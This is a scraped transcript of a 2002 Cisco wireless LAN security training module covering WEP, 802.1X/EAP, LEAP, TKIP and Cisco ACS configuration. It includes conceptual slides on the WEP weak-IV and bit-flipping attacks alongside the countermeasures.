Скачать презентацию
Идет загрузка презентации. Пожалуйста, подождите
Презентация была опубликована 9 лет назад пользователемВиктория Яшкина
1 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-1 © 2002, Cisco Systems, Inc. All rights reserved.
2 2 Security 9-2
3 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-3
4 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-4 Objectives Upon completion of this module, you will be able to perform the following tasks: Configure an access point and wireless client to use security measures. Explain how and 802.1X can provide better security for a WLAN. Explain how to configure a WLAN to provide the same levels of security that a wired LAN would provide. Configure Cisco ACS for use with Cisco Aironet products.
5 Basic Security Features © 2002, Cisco Systems, Inc. All rights reserved. 5
6 AWLF 3.0Module 9-6 Enabling Authentication on Access Point
7 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-7 User Information
8 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-8 User Manager
9 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-9 Enabling Access Point Console Security
10 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-10 Additional Method for Enabling Access Point Console Security Centralized Administrator Authentication
11 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-11 User Password
12 Security © 2002, Cisco Systems, Inc. All rights reserved. 12
13 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-13 Why WLAN Security? equipment is widely available and inexpensive Availability of Sniffers Statistics on WLAN Securities Media-hype about hot-spots, WLAN hacking (Major Electronics Retail Chain, etc…) War driving This can be controlled from Access Control Server or any RADIUS Server I found another one!
14 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-14 Older Security Methods Older forms of security on WLANs SSID Authentication controlled by MAC
15 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Security Wired Equivalency Privacy bit keys 128 bit keys (optional) Part of the association process Uses the RC4 stream cipher of RSA Data Security, Inc. encryption
16 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Open Authentication AP A confirms association and registers client. [ RF PACKET ] Access Point B Access Point B Access Point A Access Point A Initial Connection to an Access Point Client sends probe request. [ RF PACKET ] AP (A/B) send probe response. Client evaluates AP response, selects best AP. [ RF PACKET ] Client sends authentication request to selected AP (A). [ RF PACKET ] AP (A) confirms authentication and registers client. [ RF PACKET ] Client sends association request to selected AP (A). [ RF PACKET ]
17 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Shared Key Authentication Client sends an authentication request to AP (A). [ RF PACKET ] AP (A) send authentication response containing the unencrypted challenge text. [ RF PACKET ] AP (A) compares the encrypted challenge text with its copy of the encrypted challenge text. If the text is the same AP (A) will allow the Client onto the WLAN. [ RF PACKET ] Steps 1-3 are the same as Open Authentication Client encrypts the challenge text using one of its WEP keys and sends it to AP (A). [ RF PACKET ] Access Point B Access Point B Access Point A Access Point A
18 Configuring the Access Point for WEP © 2002, Cisco Systems, Inc. All rights reserved. 18
19 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-19 Access Point WEP Setup
20 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-20 Access Point WEP Setup (cont.)
21 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-21 Access Point WEP Setup (cont.)
22 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-22 Access Point WEP Setup (cont.)
23 Configuring the Client for WEP © 2002, Cisco Systems, Inc. All rights reserved. 23
24 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-24 Configuring WEP Keys Aironet Client Utility
25 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-25 Configuring WEP Keys (cont.)
26 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-26 Configuring WEP Keys (cont.) Client Access Point Keys must match!
27 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-27 Configuring WEP Keys (cont.) Header: Use Key3Data: Encrypted using KEY3Trailer Header: Use Key2Data: Encrypted using KEY2Trailer Key1=1234…… Key2=5678…… Key3=9012…… Key4=3456……
28 Problems with WEP Security © 2002, Cisco Systems, Inc. All rights reserved. 28
29 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Security Issues SSID (Service Set Identifier) 32 ASCII character string If access point broadcasts SSID under , any client with a NULL string will associate to any access point regardless of SSID setting on access point This should not be considered a security feature
30 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Security Issues (cont.) Assumes threat is outside the LAN Hardware Theft Rogue APs
31 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Security Issues (cont.) Authentication is one-way No way to dynamically generate keys No integration with existing network authentication methods on LAN
32 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Security Issues (cont.) Authentication is device-based No method for account auditing
33 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-33
34 Security Suite © 2002, Cisco Systems, Inc. All rights reserved. 34
35 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module X for WLANs 802.1X for Current security recommendation from i Based on EAP framework Improved user authentication credentials –EAP-LEAP– Username and static password –EAP-TLS– Digital certificates –EAP-PEAP– Digital certificate and username and static password or One Time Passwords Session-based encryption keys Centralized user administration
36 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module X Advantages for WLANs Mutual Authentication Encryption keys derived dynamically Ability to refresh encryption keys Centralized user and key management
37 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-37 Improved Security Coverage extending beyond the facility Two way verification
38 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-38 Improved Security (cont.) Blue Yellow Red Blue Green Red Green Yellow
39 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-39 How it Works Public/Semi- Public Network Enterprise Edge Enterprise Network Operates on client Operates on devices at network edge, like APs and switches EAP plug-in goes in RADIUS server Supplicant Authenticator Authentication Server Or
40 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-40 How it Works on the WLAN Operates on client Access Point acting as Authenticator EAP plug-in goes in RADIUS server Supplicant Authenticator Authentication Server 802.1X traffic only Public/Semi- Public Network Enterprise Edge Enterprise Network
41 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module X over Wireless Steps Associate EAP request EAP response EAP success Access request Access challenge Access request Access success Client and Access Point start using encryption RADIUS server passes session key to Access Point Access Point ignores all requests until network logon Logon RADIUS server authenticates client Client authenticates RADIUS server (process repeats in reverse) Client and RADIUS server derive session WEP key Authenticator RADIUS Server Client
42 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-42 Supplicant Use with EAP requires a Client Referred to as a Supplicant
43 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-43 O/S support for EAP Protocol Types Cisco LEAP Authentication type Quick support on multitude of host operating systems Implementation reduces support requirements on host systems EAP-TLS Native support with Windows XP O/S Third party supplicants available for other O/S EAP-PEAP Requires 802.1X/EAP support, as Native in Windows XP
44 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-44 When to Deploy LEAP Complete Cisco WLAN Solution Want single login using Windows NT/2000 Active Directory Desire dynamic WEP keys and mutual authentication Recommend deployed with TKIP Simplify deployment and administration
45 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-45 When to Deploy EAP-TLS Desire dynamic WEP key and mutual authentication Recommend deploy with TKIP Strong desire to use Client side digital certificates and Server side digital certificates to identify user credentials Already have Public Key Infrastructure Requires issue and maintenance of user certificates Capability to tie login with NT/2000 and LDAP
46 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-46 When to Deploy EAP-PEAP Desire dynamic WEP key and mutual authentication Recommend deploy with TKIP Strong desire to use OTP for user authentication Requires digital certificate on server side only Capability to tie login with NT/2000, LDAP, NDS, OTP servers, SQL
47 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-47 Non 802.1X Approach: VPN over WLAN Alternative to 802.1X over WLAN VPN/IPSec over WLAN Provides 3DES encryption Provides centralized user authentication and administration VPN Concentrator DHCP/RADIUS/OTP Servers Access Point
48 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module X Wrap-Up 802.1X WEP keys are still WEP keys Recommend TKIP and strong passwords Per user authentication Per user Dynamic WEP keys Ability to change
49 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-49 Cisco WLAN Security Suite LEAP 802.1X authentication Support for operating systems that do not have built-in EAP support TKIP Message Integrity Check Per-packet Key Hashing Broadcast Key Rotation LEAP TKIP SECURITY
50 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-50 WEP: Security Enhancements IEEE Task Group i is working on enhancements to mitigate WEP vulnerabilities Temporal Key Integrity Protocol (TKIP) 802.1X for AES (to replace WEP) Cisco supports an early implementation of IEEE Task Group i recommendations (TKIP): IV Key Hashing MIC Broadcast Key rotation for LEAP
51 WLAN Attacks © 2002, Cisco Systems, Inc. All rights reserved. 51
52 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-52 WEP Attacks University of California, Berkeley University of Maryland Scott Fluhrer, Itsik Mantin, and Adi Shamir Feb April 2001 July 2001 Focuses on static WEP; discusses need for key management Focuses on authentication; identifies flaws in one vendors proprietary scheme Focuses on inherent weaknesses in RC4; describes pragmatic attacks against RC4/WEP In practice, most installations use a single key that is shared between all mobile stations and access points. More sophisticated key management techniques can be used to help defend from the attacks we describe… -University of California, Berkeley report on WEP security, -
53 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-53 AirSnort Weak IV Attack Attack is based on Fluhrer/Mantin/Shamir paper Initialization vector (IV) is 24-bit field that changes with each packet RC4 Key Scheduling Algorithm creates IV from base key Flaw in WEP implementation of RC4 allows creation of weak IVs that give insight into base key More packets = more weak IVs = better chance to determine base key To break key, hacker needs 100,000-1,000,000 packets IVencrypted dataICV WEP frame dest addrsrc addr
54 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-54 TKIP: WEP Key Hashing IVbase key RC4 stream cipher plaintext data encrypted data RC4 stream cipher IVbase key hash Because packet key is hash of IV and base key, IV no longer gives insight into base key XOR packet keyIV no key hashingkey hashing
55 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-55 Bit-Flipping and Replay Attack Hacker intercepts WEP-encrypted packet Hacker flips bits in packet and recalculates ICV CRC32 Hacker transmits to access point bit-flipped frame with known IV Because CRC32 is correct, access point accepts, forwards frame Layer 3 device rejects and sends predictable response Access point encrypts response and sends it to hacker Hacker uses response to derive key (stream cipher) message XOR plain text 1234 stream cipher XXYYZZ cipher text XOR 1234 stream cipher message predicted plain text
56 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-56 TKIP: Message Integrity Check (MIC) IVencrypted data dest addr WEP frame stream cipher XOR Sender adds MIC to packet stream cipher XOR Recipient examines MIC; discards packet if MIC is not intact src addr MICseq #plaintextICV MICseq #plaintextICV
57 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-57 Recommendations to Customers Upgrade to latest Aironet software (TKIP functionality) Key hashing nullifies weak IV attack Message integrity check nullifies bit-flipping/replay attack Pre-Standard version Deploy 802.1X for Use stronger passwords, mutual authentication Use keys that are dynamic, not static Implement policy to timeout WLAN sessions and change keys As a last resort, use static WEP keys on non-Cisco clients Talk to client vendors about plans to support WEP enhancements and 802.1X for authentication types Change static keys as often as practical
58 Configuring WLAN Devices for Authentication © 2002, Cisco Systems, Inc. All rights reserved. 58
59 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-59 Supported Devices What can be a client? Client Non-Root bridge Repeater access point Workgroup Bridge Authenticator? Root access point Root bridge ?
60 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-60 Enabling Authentication on Access Point
61 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-61 Defining an Authenticator
62 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-62 WEP Configuration on the Access Point
63 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-63 Configuring the Access Point for MIC
64 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-64 Configuring the Access Point for WEP Key Hashing
65 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-65 Enabling Broadcast WEP Key Rotation
66 Configuring the Client for Authentication © 2002, Cisco Systems, Inc. All rights reserved. 66
67 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-67 Enabling LEAP on the Client
68 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-68 Configuring LEAP on the Client
69 Configuring Non-Root devices for Authentication © 2002, Cisco Systems, Inc. All rights reserved. 69
70 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-70 Using LEAP with Non-Root Devices Non-Root bridge Repeater access point Must be configured to authenticate through Root device
71 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-71 Configuring a Non-Root device for LEAP Authentication
72 Configuring Cisco ACS © 2002, Cisco Systems, Inc. All rights reserved. 72
73 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-73 Cisco ACS: Main Screen
74 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-74 Network Configuration
75 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-75 Access Server Setup Example
76 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-76 Access Server Setup Example (cont.)
77 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-77 External User Database
78 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-78 External User Database: Windows NT/2000
79 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-79 Windows NT/2000 Database (cont.)
80 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-80 Windows NT/2000 Database (cont.)
81 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-81 Windows NT/2000 Database (cont.)
82 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-82 Session Policy Setup
83 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-83 Session Policy Setup (cont.)
84 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-84 Session Policy Setup (cont.)
85 User Setup © 2002, Cisco Systems, Inc. All rights reserved. 85
86 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-86 User Setup in ACS
87 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-87 User Setup in ACS (cont.)
88 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-88 User Setup in ACS: New User
89 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-89 User Setup in ACS: New User (cont.)
90 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-90 User Setup in ACS: New User (cont.)
91 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-91 User Setup in ACS: New User (cont.)
92 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-92 Windows 2000 User Setup: Dial-In Permission
93 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-93 MAC Address Authentication Use for devices not capable of performing EAP authentication Username and Password are MAC address
94 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-94 MAC Address Authentication: Access Point Setup
95 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-95 MAC Address Authentication: Access Point Setup (cont.)
96 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-96 Security Evaluation Encrypted WLAN stats Attackers more likely to attack unsecured WLANs Proper planning and implementation Estimate potential security threats and the level of security needed Evaluate amount of WLAN traffic being sent when deciding WLAN Security Options
97 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-97 Summary Upon completion of this module, you will be able to perform the following tasks: Identify security issues and concerns associated with WLANs and how to overcome these issues Help the customer to choose the proper level of security to maintain their current level of network security on their new WLAN. Configure clients, APs, and Cisco ACS to take advantage of the security features.
98 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module 9-98 Review Questions What WEP key size(s) does the Wi-Fi specify? Why should the SSID not be considered a security feature? What is the advantage of a two-way authentication? Why are security measures beyond the WEP security needed? What is required on the client to use EAP and 802.1X security features?
100 © 2002, Cisco Systems, Inc. All rights reserved. AWLF 3.0Module Blank for pagination
Еще похожие презентации в нашем архиве:
© 2024 MyShared Inc.
All rights reserved.